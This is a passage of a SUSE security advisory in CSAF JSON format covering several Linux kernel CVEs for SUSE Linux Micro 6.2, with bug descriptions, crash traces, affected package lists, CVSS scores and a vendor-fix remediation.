"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix the inode leak in btrfs_iget()\n\n[BUG]\nThere is a bug report that a syzbot reproducer can lead to the following\nbusy inode at unmount time:\n\n BTRFS info (device loop1): last unmount of filesystem 1680000e-3c1e-4c46-84b6-56bd3909af50\n VFS: Busy inodes after unmount of loop1 (btrfs)\n ------------[ cut here ]------------\n kernel BUG at fs/super.c:650!\n Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n CPU: 0 UID: 0 PID: 48168 Comm: syz-executor Not tainted 6.15.0-rc2-00471-g119009db2674 #2 PREEMPT(full)\n Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n RIP: 0010:generic_shutdown_super+0x2e9/0x390 fs/super.c:650\n Call Trace:\n \u003cTASK\u003e\n kill_anon_super+0x3a/0x60 fs/super.c:1237\n btrfs_kill_super+0x3b/0x50 fs/btrfs/super.c:2099\n deactivate_locked_super+0xbe/0x1a0 fs/super.c:473\n deactivate_super fs/super.c:506 [inline]\n deactivate_super+0xe2/0x100 fs/super.c:502\n cleanup_mnt+0x21f/0x440 fs/namespace.c:1435\n task_work_run+0x14d/0x240 kernel/task_work.c:227\n resume_user_mode_work include/linux/resume_user_mode.h:50 [inline]\n exit_to_user_mode_loop kernel/entry/common.c:114 [inline]\n exit_to_user_mode_prepare include/linux/entry-common.h:329 [inline]\n __syscall_exit_to_user_mode_work kernel/entry/common.c:207 [inline]\n syscall_exit_to_user_mode+0x269/0x290 kernel/entry/common.c:218\n do_syscall_64+0xd4/0x250 arch/x86/entry/syscall_64.c:100\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n \u003c/TASK\u003e\n\n[CAUSE]\nWhen btrfs_alloc_path() failed, btrfs_iget() directly returned without\nreleasing the inode already allocated by btrfs_iget_locked().\n\nThis results the above busy inode and trigger the kernel BUG.\n\n[FIX]\nFix it by calling iget_failed() if btrfs_alloc_path() failed.\n\nIf we hit error inside btrfs_read_locked_inode(), it will properly call\niget_failed(), so nothing to worry about.\n\nAlthough the iget_failed() cleanup inside btrfs_read_locked_inode() is a\nbreak of the normal error handling scheme, let\u0027s fix the obvious bug\nand backport first, then rework the error handling later.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37904",
"url": "https://www.suse.com/security/cve/CVE-2025-37904"
},
{
"category": "external",
"summary": "SUSE Bug 1243452 for CVE-2025-37904",
"url": "https://bugzilla.suse.com/1243452"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-37904"
},
{
"cve": "CVE-2025-37955",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37955"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio-net: free xsk_buffs on error in virtnet_xsk_pool_enable()\n\nThe selftests added to our CI by Bui Quang Minh recently reveals\nthat there is a mem leak on the error path of virtnet_xsk_pool_enable():\n\nunreferenced object 0xffff88800a68a000 (size 2048):\n comm \"xdp_helper\", pid 318, jiffies 4294692778\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace (crc 0):\n __kvmalloc_node_noprof+0x402/0x570\n virtnet_xsk_pool_enable+0x293/0x6a0 (drivers/net/virtio_net.c:5882)\n xp_assign_dev+0x369/0x670 (net/xdp/xsk_buff_pool.c:226)\n xsk_bind+0x6a5/0x1ae0\n __sys_bind+0x15e/0x230\n __x64_sys_bind+0x72/0xb0\n do_syscall_64+0xc1/0x1d0\n entry_SYSCALL_64_after_hwframe+0x77/0x7f",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37955",
"url": "https://www.suse.com/security/cve/CVE-2025-37955"
},
{
"category": "external",
"summary": "SUSE Bug 1243507 for CVE-2025-37955",
"url": "https://bugzilla.suse.com/1243507"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-37955"
},
{
"cve": "CVE-2025-38243",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38243"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix invalid inode pointer dereferences during log replay\n\nIn a few places where we call read_one_inode(), if we get a NULL pointer\nwe end up jumping into an error path, or fallthrough in case of\n__add_inode_ref(), where we then do something like this:\n\n iput(\u0026inode-\u003evfs_inode);\n\nwhich results in an invalid inode pointer that triggers an invalid memory\naccess, resulting in a crash.\n\nFix this by making sure we don\u0027t do such dereferences.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38243",
"url": "https://www.suse.com/security/cve/CVE-2025-38243"
},
{
"category": "external",
"summary": "SUSE Bug 1246184 for CVE-2025-38243",
"url": "https://bugzilla.suse.com/1246184"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38243"
},
{
"cve": "CVE-2025-38262",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38262"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntty: serial: uartlite: register uart driver in init\n\nWhen two instances of uart devices are probing, a concurrency race can\noccur. If one thread calls uart_register_driver function, which first\nallocates and assigns memory to \u0027uart_state\u0027 member of uart_driver\nstructure, the other instance can bypass uart driver registration and\ncall ulite_assign. This calls uart_add_one_port, which expects the uart\ndriver to be fully initialized. This leads to a kernel panic due to a\nnull pointer dereference:\n\n[ 8.143581] BUG: kernel NULL pointer dereference, address: 00000000000002b8\n[ 8.156982] #PF: supervisor write access in kernel mode\n[ 8.156984] #PF: error_code(0x0002) - not-present page\n[ 8.156986] PGD 0 P4D 0\n...\n[ 8.180668] RIP: 0010:mutex_lock+0x19/0x30\n[ 8.188624] Call Trace:\n[ 8.188629] ? __die_body.cold+0x1a/0x1f\n[ 8.195260] ? page_fault_oops+0x15c/0x290\n[ 